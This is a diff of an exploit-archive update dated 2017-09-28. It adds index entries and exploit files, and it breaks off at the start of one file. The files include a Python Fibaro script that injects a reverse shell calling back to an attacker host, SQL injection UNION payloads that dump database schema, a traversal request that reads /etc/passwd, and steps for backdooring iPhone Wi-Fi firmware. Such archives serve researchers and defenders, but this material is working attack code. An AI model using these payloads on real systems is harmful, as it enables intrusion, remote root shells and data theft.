DB: 2017-09-28

21 new exploits

Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing
Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing
Adobe Flash - Out-of-Bounds Read in applyToRange

CyberArk Viewfinity 5.5.10.95 - Privilege Escalation

PDF-XChange Viewer 2.5 Build 314.0 - Remote Code Execution

Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response

Tiny HTTPd 0.1.0 - Directory Traversal

Free PHP photo Gallery script - Remote File Inclusion
Free PHP Photo Gallery Script - Remote File Inclusion

WordPress Plugin School Management System - SQL Injection
iTech Dating Script 3.40 - SQL Injection
iTech Job Script 9.27 - SQL Injection
WordPress Plugin Content Timeline - SQL Injection
Job Links - Arbitrary File Upload
TicketPlus - Arbitrary File Upload
Photo Fusion - Arbitrary File Upload
SMSmaster - SQL Injection
AMC Master - Arbitrary File Upload
WordPress Plugin WPCHURCH - SQL Injection
WordPress Plugin WPGYM - SQL Injection
WordPress Plugin Hospital Management System - SQL Injection
Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation
WordPress Plugin WPAMS - SQL Injection

files.csv

@@ -5685,6 +5685,9 @@ id,file,description,date,author,platform,type,port
 42764,platforms/windows/dos/42764.html,"Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes",2017-09-21,"Google Security Research",windows,dos,0
 42765,platforms/windows/dos/42765.html,"Microsoft Edge Chakra - 'Parser::ParseCatch' does not Handle 'eval'",2017-09-21,"Google Security Research",windows,dos,0
 42766,platforms/windows/dos/42766.html,"Microsoft Edge Chakra - 'JavascriptFunction::ReparseAsmJsModule' Incorrectly Re-parses",2017-09-21,"Google Security Research",windows,dos,0
+42781,platforms/multiple/dos/42781.txt,"Adobe Flash - Out-of-Bounds Memory Read in MP4 Parsing",2017-09-25,"Google Security Research",multiple,dos,0
+42782,platforms/multiple/dos/42782.txt,"Adobe Flash - Out-of-Bounds Write in MP4 Edge Processing",2017-09-25,"Google Security Research",multiple,dos,0
+42783,platforms/multiple/dos/42783.txt,"Adobe Flash - Out-of-Bounds Read in applyToRange",2017-09-25,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9215,6 +9218,7 @@ id,file,description,date,author,platform,type,port
 42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
 42542,platforms/windows/local/42542.txt,"Automated Logic WebCTRL 6.5 - Privilege Escalation",2017-08-22,LiquidWorm,windows,local,0
 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
+42319,platforms/windows/local/42319.txt,"CyberArk Viewfinity 5.5.10.95 - Privilege Escalation",2017-07-13,geoda,windows,local,0
 42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
 42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0
 42356,platforms/linux/local/42356.txt,"Docker Daemon - Unprotected TCP Socket",2017-07-20,"Martin Pizala",linux,local,0
@@ -9236,6 +9240,7 @@ id,file,description,date,author,platform,type,port
 42456,platforms/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
 42521,platforms/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",windows,local,0
 42536,platforms/windows/local/42536.py,"Disk Pulse Enterprise 9.9.16 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0
+42537,platforms/windows/local/42537.txt,"PDF-XChange Viewer 2.5 Build 314.0 - Remote Code Execution",2017-08-21,"Daniele Votta",windows,local,0
 42538,platforms/windows/local/42538.py,"Disk Savvy Enterprise 9.9.14 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0
 42539,platforms/windows/local/42539.py,"VX Search Enterprise 9.9.12 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0
 42540,platforms/windows/local/42540.rb,"Microsoft Windows - Escalate UAC Protection Bypass (Via COM Handler Hijack) (Metasploit)",2017-08-22,Metasploit,windows,local,0
@@ -15852,7 +15857,9 @@ id,file,description,date,author,platform,type,port
 42778,platforms/windows/remote/42778.py,"Disk Pulse Enterprise 10.0.12 - GET Buffer Overflow (SEH)",2017-09-25,sickness,windows,remote,80
 42767,platforms/windows/remote/42767.rb,"Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow (Metasploit)",2017-09-21,Metasploit,windows,remote,80
 42780,platforms/windows/remote/42780.py,"Oracle 9i XDB 9.2.0.1 - HTTP PASS Buffer Overflow",2017-09-25,"Charles Dardaman",windows,remote,0
+42784,platforms/ios/remote/42784.txt,"Apple iOS 10.2 - Broadcom Out-of-Bounds Write when Handling 802.11k Neighbor Report Response",2017-09-25,"Google Security Research",ios,remote,0
 42787,platforms/hardware/remote/42787.txt,"FLIR Thermal Camera F/FC/PT/D - SSH Backdoor",2017-09-25,LiquidWorm,hardware,remote,0
+42790,platforms/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",linux,remote,0
 42793,platforms/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,multiple,remote,5858
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
@@ -24447,7 +24454,7 @@ id,file,description,date,author,platform,type,port
 14435,platforms/php/webapps/14435.txt,"AJ HYIP PRIME - 'welcome.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0
 14436,platforms/php/webapps/14436.txt,"AJ HYIP MERIDIAN - 'news.php id' Blind SQL Injection",2010-07-22,JosS,php,webapps,0
 14437,platforms/php/webapps/14437.txt,"Free PHP photo Gallery script - Remote Command Execution",2010-07-22,"ViRuS Qalaa",php,webapps,0
-14438,platforms/php/webapps/14438.txt,"Free PHP photo Gallery script - Remote File Inclusion",2010-07-22,"ViRuS Qalaa",php,webapps,0
+14438,platforms/php/webapps/14438.txt,"Free PHP Photo Gallery Script - Remote File Inclusion",2010-07-22,"ViRuS Qalaa",php,webapps,0
 14439,platforms/php/webapps/14439.txt,"phpBazar Admin - Information Disclosure",2010-07-22,Net_Spy,php,webapps,0
 14440,platforms/php/webapps/14440.txt,"phpBB MOD 2.0.19 - Invitation Only (PassCode Bypass)",2010-07-22,Silic0n,php,webapps,0
 14441,platforms/php/webapps/14441.txt,"WordPress Plugin myLDlinker - SQL Injection",2010-07-22,H-SK33PY,php,webapps,0
@@ -38123,6 +38130,7 @@ id,file,description,date,author,platform,type,port
 41697,platforms/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
 41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
+42804,platforms/php/webapps/42804.txt,"WordPress Plugin School Management System - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
 42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0
 42547,platforms/hardware/webapps/42547.py,"Wireless Repeater BE126 - Local File Inclusion",2017-08-23,"Hay Mizrachi",hardware,webapps,0
 42545,platforms/php/webapps/42545.txt,"Matrimonial Script - SQL Injection",2017-08-22,"Ihsan Sencan",php,webapps,0
@@ -38419,6 +38427,8 @@ id,file,description,date,author,platform,type,port
 42510,platforms/php/webapps/42510.txt,"iTech Freelancer Script 5.27 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42511,platforms/php/webapps/42511.txt,"iTech Travel Script 9.49 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42513,platforms/php/webapps/42513.txt,"iTech Multi Vendor Script 6.63 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42514,platforms/php/webapps/42514.txt,"iTech Dating Script 3.40 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
+42515,platforms/php/webapps/42515.txt,"iTech Job Script 9.27 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42524,platforms/php/webapps/42524.txt,"Joomla! Component Flip Wall 8.0 - 'wallid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
 42525,platforms/php/webapps/42525.txt,"Joomla! Component Sponsor Wall 8.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
 42526,platforms/php/webapps/42526.txt,"PHP Classifieds Script 5.6.2 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
@@ -38565,3 +38575,14 @@ id,file,description,date,author,platform,type,port
 42788,platforms/hardware/webapps/42788.txt,"FLIR Thermal Camera FC-S/PT - Command Injection",2017-09-25,LiquidWorm,hardware,webapps,0
 42789,platforms/hardware/webapps/42789.txt,"FLIR Thermal Camera F/FC/PT/D - Stream Disclosure",2017-09-25,LiquidWorm,hardware,webapps,0
 42792,platforms/asp/webapps/42792.txt,"Sitefinity CMS 9.2 - Cross-Site Scripting",2017-08-31,"Pralhad Chaskar",asp,webapps,0
+42794,platforms/php/webapps/42794.txt,"WordPress Plugin Content Timeline - SQL Injection",2017-09-16,"Jeroen - IT Nerdbox",php,webapps,0
+42795,platforms/php/webapps/42795.txt,"Job Links - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",php,webapps,0
+42796,platforms/php/webapps/42796.txt,"TicketPlus - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",php,webapps,0
+42797,platforms/php/webapps/42797.txt,"Photo Fusion - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",php,webapps,0
+42798,platforms/php/webapps/42798.txt,"SMSmaster - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
+42799,platforms/php/webapps/42799.txt,"AMC Master - Arbitrary File Upload",2017-09-26,"Ihsan Sencan",php,webapps,0
+42800,platforms/php/webapps/42800.txt,"WordPress Plugin WPCHURCH - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
+42801,platforms/php/webapps/42801.txt,"WordPress Plugin WPGYM - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
+42802,platforms/php/webapps/42802.txt,"WordPress Plugin Hospital Management System - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0
+42884,platforms/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,multiple,webapps,0
+42805,platforms/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",php,webapps,0

platforms/ios/remote/42784.txt

@@ -0,0 +1,35 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1289
+
+The exploit gains code execution on the Wi-Fi firmware on the iPhone 7.
+
+The exploit has been tested against the Wi-Fi firmware as present on iOS 10.2 (14C92), but should work on all versions of iOS up to 10.3.3 (included). However, some symbols might need to be adjusted for different versions of iOS, see "exploit/symbols.py" for more information.
+
+Upon successful execution of the exploit, a backdoor is inserted into the firmware, allowing remote read/write commands to be issued to the firmware via crafted action frames (thus allowing easy remote control over the Wi-Fi chip). 
+
+The attached archive contains the following directories:
+  -hostapd-2.6 - A modified version of hostapd utilised in the exploit. This version of hostapd is configured to
+                 support 802.11k RRM, and in particular Neighbor Reports. Moreover, this version of hostapd is
+                 instrumented to add various commands, allowing injection and reception of crafted action frames
+                 used throughout the exploit.
+  -exploit     - The exploit itself.
+
+To run the exploit, you must execute the following steps:
+  -Connect (and enable) a SoftMAC Wi-Fi dongle to your machine (such as the TL-WN722N)
+  -Compile the provided version of hostapd
+  -Modify the "interface" setting under "hostapd-2.6/hostapd/hostapd.conf" to match your interface's name
+  -Configure the following settings under "exploit/conf.py":
+    -HOSTAPD_DIR - The directory of the hostapd binary compiled above
+    -TARGET_MAC  - The MAC address of the device being exploited
+    -AP_MAC      - The MAC address of your wireless dongle
+    -INTERFACE   - The name of the wireless dongle's interface
+  -Assemble the backdoor shellcode by running "exploit/assemble_backdoor.sh"
+  -Run hostapd with the configuration file provided above, broadcasting a Wi-Fi network ("test80211k")
+  -Connect the target device to the network
+  -Run "exploit/attack.py"
+
+Following the steps above should result in installation of a simple backdoor allowing read/write access to the firmware. You can interact with the backdoor to gain R/W access to the firmware by calling the "read_dword" and "write_dword" functions, respectively.
+
+
+Proof of Concept:
+ 
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42784.zip

platforms/linux/remote/42790.txt

@@ -0,0 +1,33 @@
+#======================================================================================
+# Exploit Author: Touhid M.Shaikh
+# Exploit Title: Tiny HTTPd 0.1.0 Local File Traversal
+# Date: 26-09-2017
+# Website: www.touhidshaikh.com
+# Vulnerable Software:  Tiny HTTPd
+# Version: 0.1.0
+# Download Link:
+https://sourceforge.net/projects/tinyhttpd/?source=directory
+#======================================================================================
+
+
+
+# To reproduce the exploit:
+#   1. run the #./httpd
+#   2. #nc localhost 44123
+# GET /../../../../../../../../../../../etc/passwd HTTP/1.1
+
+
+#==========
+#Responce
+#==========
+
+
+HTTP/1.0 200 OK
+Server: jdbhttpd/0.1.0
+Content-Type: text/html
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+---------------------snip---------------------------

platforms/multiple/dos/42781.txt

@@ -0,0 +1,8 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1321
+
+The attached MP4 file causes an out-of-bounds memory access when played in flash player.
+
+
+Proof of Concept:
+ 
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42781.zip

platforms/multiple/dos/42782.txt

@@ -0,0 +1,8 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1322
+
+The attached fuzzed MP4 file causes an out-of-bounds memory access when played with Adobe Flash 
+
+
+Proof of Concept:
+ 
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42782.zip

platforms/multiple/dos/42783.txt

@@ -0,0 +1,8 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1323
+
+The attached fuzzed file causes an out-of-bounds read in TextFormat.applyToRange.
+
+
+Proof of Concept:
+ 
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42783.zip

platforms/multiple/webapps/42884.py

@@ -0,0 +1,45 @@
+#!/usr/bin/python
+
+import requests
+import argparse
+import urllib
+import base64
+import tarfile
+import os
+
+parser = argparse.ArgumentParser(description='Fibaro RCE')
+parser.add_argument('--rhost')
+parser.add_argument('--lhost')
+parser.add_argument('--lport')
+args = parser.parse_args()
+
+f = open('run.sh', 'w')
+f.write('#!/bin/bash\n')
+f.write('/bin/bash -i >& /dev/tcp/' + args.lhost + '/' + args.lport + ' 0>&1\n')
+f.close()
+
+os.chmod('run.sh', 0777)
+
+tar = tarfile.open("root.tar.gz", "w:gz")
+tar.add("run.sh")
+tar.close()
+
+with open("root.tar.gz", "rb") as tarfile:
+tar64 = base64.b64encode(tarfile.read())
+
+wwwexec = urllib.quote_plus(base64.b64encode("echo '" + tar64 + "' | base64 -d > /tmp/patch.tar.gz && sudo update --manual /tmp/patch.tar.gz"))
+
+os.remove('run.sh')
+os.remove('root.tar.gz')
+
+headers = {
+'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0',
+'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
+'X-Fibaro-Version': '2',
+'X-Requested-With': 'XMLHttpRequest',
+}
+
+data = 'deviceID=1&deviceName=&deviceType=&cmd1=`echo${IFS}' + wwwexec + '|base64${IFS}-d|/bin/bash`&cmd2=&roomID=1&roomName=&sectionID=&sectionName=&lang=en'
+print "[+] Popping a root shell..."
+
+requests.post('http://' + args.rhost + '/services/liliSetDeviceCommand.php', headers=headers, data=data, verify=False)

platforms/php/webapps/42514.txt

@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: iTech Dating Script 3.40 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : http://itechscripts.com/
+# Software Link: http://itechscripts.com/dating-script/
+# Demo: http://dating.itechscripts.com/
+# Version: 3.40
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/see_more_details.php?id=[SQL]
+# -48+UNION(SELECT+0x283129,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929)--+-
+#
+# http://localhost/[PATH]/send_gift.php?id=[SQL]
+#
+# Etc...
+# # # # #

platforms/php/webapps/42515.txt

@@ -0,0 +1,28 @@
+# # # # #
+# Exploit Title: iTech Job Script 9.27 - SQL Injection
+# Dork: N/A
+# Date: 18.08.2017
+# Vendor Homepage : http://itechscripts.com/
+# Software Link: http://itechscripts.com/job-portal-script/
+# Demo: http://job-portal.itechscripts.com/
+# Version: 9.27
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/Employer_Details.php?id=[SQL]
+# -3'++UNION+ALL+SELECT+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332--+-
+# 
+# http://localhost/[PATH]/Job_Details.php?id=[SQL]
+#
+# Etc...
+# # # # #

platforms/php/webapps/42794.txt

@@ -0,0 +1,65 @@
+# Exploit Title: Multiple Blind SQL Injections Wordpress Plugin: Content Timeline
+# Google Dork: -
+# Date: September 16, 2017
+# Exploit Author: Jeroen - ITNerdbox
+# Vendor Homepage: http://www.shindiristudio.com/
+# Software Link: https://codecanyon.net/item/content-timeline-responsive-wordpress-plugin-for-displaying-postscategories-in-a-sliding-timeline/3027163
+# Version: 4.4.2
+# Tested on: Linux / Nginx / Wordpress 4.8.1 / PHP 7.0.22
+# CVE : CVE-2017-14507
+
+## Proof of Concept
+
+http(s)://www.target.tld/wp-admin/admin-ajax.php?action=ctimeline_frontend_get&timeline={inject here}
+
+## Problem in file : content_timeline_class.php    
+
+function ajax_frontend_get(){
+
+        $timelineId = $_GET['timeline'];
+
+        $id = $_GET['id'];
+
+        global $wpdb;
+
+        if($timelineId) {
+
+                $timeline = $wpdb->get_results('SELECT * FROM ' . $wpdb->prefix . 'ctimelines WHERE id='.$timelineId);
+
+                $timeline = $timeline[0];
+
+Problem exists in the GET parameter called 'timeline' which is not sanitized and used in dynamically generating the
+
+SQL syntax.
+
+## Problem in file : pages/content_timeline_edit.php
+
+    if(isset($_GET['id'])) {
+
+        global $wpdb;
+
+        $timeline = $wpdb->get_results('SELECT * FROM ' . $wpdb->prefix . 'ctimelines WHERE id='.$_GET['id']);
+
+Problem exists in the GET parameter called 'id' which is not sanitized and used in dynamically generating the
+
+SQL syntax.
+
+## Problem in file : pages/content_timeline_index.php
+
+            if(isset($_GET['action']) && $_GET['action'] == 'delete') {
+
+                $wpdb->query('DELETE FROM '. $prefix . 'ctimelines WHERE id = '.$_GET['id']);
+
+            }
+
+Problem exists in the GET parameter called 'id' which is not sanitized and used in dynamically generating the
+
+SQL syntax.
+
+## History
+
+09-16-2017        Contacted the author
+09-16-2017        Requested CVE-ID
+09-18-2017        CVE-ID Received
+09-18-2017        Contacted the author again
+09-26-2017 No reaction from author, thus releasing.

platforms/php/webapps/42795.txt

@@ -0,0 +1,63 @@
+# # # # # 
+# Exploit Title: Job Links - Complete Job Management Script - Arbitrary File Upload
+# Dork: N/A
+# Date: 26.09.2017
+# Vendor Homepage: http://teamworktec.com/
+# Software Link: https://codecanyon.net/item/job-links-complete-job-management-script/20672089
+# Demo: http://teamworktec.com/demo/job-links/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# 
+# The vulnerability allows an Job Seeker & Employer users upload arbitrary file....
+# 
+# Vulnerable Source:
+# 
+#      changes in user profile
+#      */
+#     public function profileChange(Request $request){
+#         $users =  User::find(Auth::id());
+#         if (!empty($request->avatar)) {
+#             $large_image = public_path('uploads/'.$users->avatar);
+#             File::delete($large_image);
+#             $file = $request->avatar;
+#             $users->avatar  = $file->getClientOriginalName();
+#             $users->save();
+#             $file->move('uploads', $file->getClientOriginalName());
+#             return $request->avatar->getClientOriginalName();
+#         } else
+#             return $users->avatar;
+#     }
+# 
+#     /*
+#      change Cover picture
+#      */
+#     public function coverChange(Request $request){
+#         $users =  User::find(Auth::id());
+# 
+#         if (!empty($request->cover)) {
+#             $large_image = public_path('uploads/'.$users->cover);
+#             File::delete($large_image);
+#             $file = $request->cover;
+#             $users->cover  = $file->getClientOriginalName();
+#             $users->save();
+#             $file->move('uploads', $file->getClientOriginalName());
+#             return $request->cover->getClientOriginalName();
+#         } else
+#             return $users->cover;
+#     }
+# 	
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/profile/[UserName]
+# http://localhost/[PATH]/uploads/[FILE]
+# 
+# Etc..
+# # # # #

platforms/php/webapps/42796.txt

@@ -0,0 +1,48 @@
+# # # # # 
+# Exploit Title: TicketPlus - Support Ticket Management System - Arbitrary File Upload
+# Dork: N/A
+# Date: 26.09.2017
+# Vendor Homepage: http://teamworktec.com/
+# Software Link: https://codecanyon.net/item/ticketplus-support-ticket-management-system/20221316
+# Demo: http://sportsgrand.com/demo/ticket_plus/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# 
+# The vulnerability allows an users upload arbitrary file....
+# 
+# Vulnerable Source:
+# 
+#     public function updateProfile(Request $request) {
+#         $this->validate($request, [
+#             'name' => 'required|max:32',
+#             'username' => 'required|max:32|unique:users,username,'.Auth::id(),
+#             'email' => 'email|max:40|unique:users,email,'.Auth::id()
+#         ]);
+# 
+#         $user = User::find(Auth::id());
+#         $user->name = $request->name;
+#         $user->username = $request->username;
+#         $user->email = $request->email;
+#         if(!empty($request->file)){
+#             $request->file->move('uploads', $request->file->getClientOriginalName());
+#             $user->avatar = $request->file->getClientOriginalName();
+#         }
+#         $user->save();
+#         return redirect()->back()->withMessage('Profile updated successfully');
+#     }
+# 	
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/profile/settings
+# http://localhost/[PATH]/uploads/[FILE]
+# 
+# Etc..
+# # # # #

platforms/php/webapps/42797.txt

@@ -0,0 +1,55 @@
+# # # # # 
+# Exploit Title: Photo Fusion - Free Stock Photos Script - Arbitrary File Upload
+# Dork: N/A
+# Date: 26.09.2017
+# Vendor Homepage: http://teamworktec.com/
+# Software Link: https://codecanyon.net/item/photo-fusion-free-stock-photos-script/20115244
+# Demo: http://teamworktec.com/demo/photos-fusion/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# 
+# The vulnerability allows an users upload arbitrary file....
+# 
+# Vulnerable Source:
+# 
+#     /*Change profile picture*/
+#     public function changeAvatar(Request $request){
+#         if(Auth::user()){
+#             $user = User::find(Auth::id());
+#             $user->avatar = $request->picture->getClientOriginalName();
+#             $user->save();
+#             $file = $request->picture;
+#             $file->move('uploads', $file->getClientOriginalName());
+#             return $request->picture->getClientOriginalName();
+#         }
+#         return 'please login to change avatar';
+#     }
+# 
+#     /*Change profile cover*/
+#     public function changeCover(Request $request){
+#         if(Auth::user()){
+#             $user = User::find(Auth::id());
+#             $user->cover = $request->cover->getClientOriginalName();
+#             $user->save();
+#             $file = $request->cover;
+#             $file->move('uploads', $file->getClientOriginalName());
+#             return $request->cover->getClientOriginalName();
+#         }
+#         return 'please login to change avatar';
+#     }
+# 	
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/
+# http://localhost/[PATH]/uploads/[FILE]
+# 
+# Etc..
+# # # # #

platforms/php/webapps/42798.txt

@@ -0,0 +1,27 @@
+# # # # # 
+# Exploit Title: SMSmaster – Multipurpose SMS Gateway for Wordpress - SQL Injection
+# Dork: N/A
+# Date: 26.09.2017
+# Vendor Homepage: http://mojoomla.com/
+# Software Link: https://codecanyon.net/item/smsmaster-multipurpose-sms-gateway-for-wordpress/20605853
+# Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/school/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an student users to inject sql commands....
+# 
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/?dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]
+# 
+# -23102%20UNION%20SELECT%201,2,3,4,5,(SELECT%20GROUP_CONCAT(table_name%20SEPARATOR%200x3c62723e)%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_SCHEMA=DATABASE()),7,8--%20-
+# 
+# Etc..
+# # # # #

platforms/php/webapps/42799.txt

@@ -0,0 +1,47 @@
+# # # # # 
+# Exploit Title: Annual Maintenance Contract Management System - Arbitrary File Upload
+# Dork: N/A
+# Date: 26.09.2017
+# Vendor Homepage: http://mojoomla.com/
+# Software Link: https://codecanyon.net/item/amc-master-annual-maintenance-contract-management-system/20667703
+# Demo: http://dasinfomedia.com.au/php/amc/
+# Version: N/A
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# 
+# The vulnerability allows an users upload arbitrary file....
+# 
+# Vulnerable Source:
+# 
+#         if(isset($id)){
+#             $user_d=$this->request->data;
+#             $this->row_update=$this->table_user->get($id);
+#             $this->set('emp_update_row',$this->row_update);
+# 
+#             if($this->request->is(['post','put'])){
+# 				
+# 				  $get_output=$this->check_update_email($this->row_update,$this->request->data('email'));
+# 							
+# 						if($get_output == true){
+# 
+#                 if(isset($_FILES['image']['name']) && !empty($_FILES['image']['name'])){
+#                     move_uploaded_file($_FILES['image']['tmp_name'],$this->user_image.$_FILES['image']['name']);
+#                     $this->store_image=$_FILES['image']['name'];
+#                 }else{
+#                     $this->store_image=$this->request->data('old_image');
+#                 }
+# 	
+# Proof of Concept: 
+# 
+# http://localhost/[PATH]/account/profilesetting/[ID]
+# http://localhost/[PATH]/img/user/[FILE]
+# 
+# Etc..
+# # # # #

platforms/php/webapps/42800.txt

@@ -0,0 +1,27 @@
+# # # # # 
